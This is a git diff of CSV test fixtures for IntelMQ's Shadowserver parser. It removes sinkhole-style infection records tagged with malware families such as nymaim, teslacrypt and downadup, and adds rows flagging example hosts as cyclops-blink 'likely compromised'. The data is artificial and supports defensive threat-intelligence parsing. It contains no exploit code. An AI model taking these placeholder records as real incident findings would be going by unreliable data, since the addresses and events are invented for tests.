-"2018-03-21 00:40:04","198.51.100.103",8447,"AT",,"avalanche-nymaim",,,51098,,,,80,"198-51-100-103.example.net",,,,,"198.51.100.7",6939,"US",0,0,,,,,,
-"2018-03-21 00:40:11","198.51.100.5",9009,"AT",,"avalanche-teslacrypt",,,16702,,,,80,"198-51-100-5.example.net",,,,,"198.51.100.24",6939,"US",0,0,,,,,,
-"2018-03-21 00:40:37","198.51.100.74",12793,"AT",,"avalanche-kins",,,51344,,,,443,"198-51-100-74.example.net",,,,,"198.51.100.174",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:40:38","198.51.100.77",6830,"AT","GET /search?q=1 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",,38430,,,"198-51-100-77.example.net",80,"198.51.100.106",,,,,"198.51.100.188",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:41:01","198.51.100.146",25255,"AT",,"avalanche-nymaim",,,2066,,,,80,"198-51-100-146.example.net",,,,,"198.51.100.12",6939,"US",0,0,,,,,,
-"2018-03-21 00:41:06","198.51.100.167",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",,2726,,,,80,"198.51.100.96",,,,,"198.51.100.62",393667,"US",0,0,,,,,,
-"2018-03-21 00:42:35","198.51.100.35",8447,"AT","GET /search?q=9 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)",,50060,,,"198-51-100-35.example.net",80,"198.51.100.35",,,,,"198.51.100.110",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:44:01","198.51.100.182",6830,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",,53884,,,"198-51-100-182.example.net",80,"198.51.100.93",,,,,"198.51.100.137",393667,"US",0,0,,,,,,
-"2018-03-21 00:44:17","198.51.100.26",1901,"AT","GET /search?q=29 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",,4852,,,"198-51-100-26.example.net",80,"198.51.100.208",,,,,"198.51.100.249",393667,"US",518210,737415,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/special.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/special.csv
new file mode 100644
index 000000000..b4da4a978
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/special.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","port","protocol","asn","geo","region","city","hostname","naics","sector","tag","public_source","status","method","device_vendor"
+"2010-02-10 00:00:00",192.168.0.1,,,64512,ZZ,Region,City,node01.example.com,0,"Communications, Service Provider, and Hosting Service",cyclops-blink,,"likely compromised",,
+"2010-02-10 00:00:01",192.168.0.2,,,64512,ZZ,Region,City,node02.example.com,0,"Communications, Service Provider, and Hosting Service",cyclops-blink,,"likely compromised",,
+"2010-02-10 00:00:02",192.168.0.3,,,64512,ZZ,Region,City,node03.example.com,0,"Professional, Scientific, and Technical Services",cyclops-blink,,"likely compromised",,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/special.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/special.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/special.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later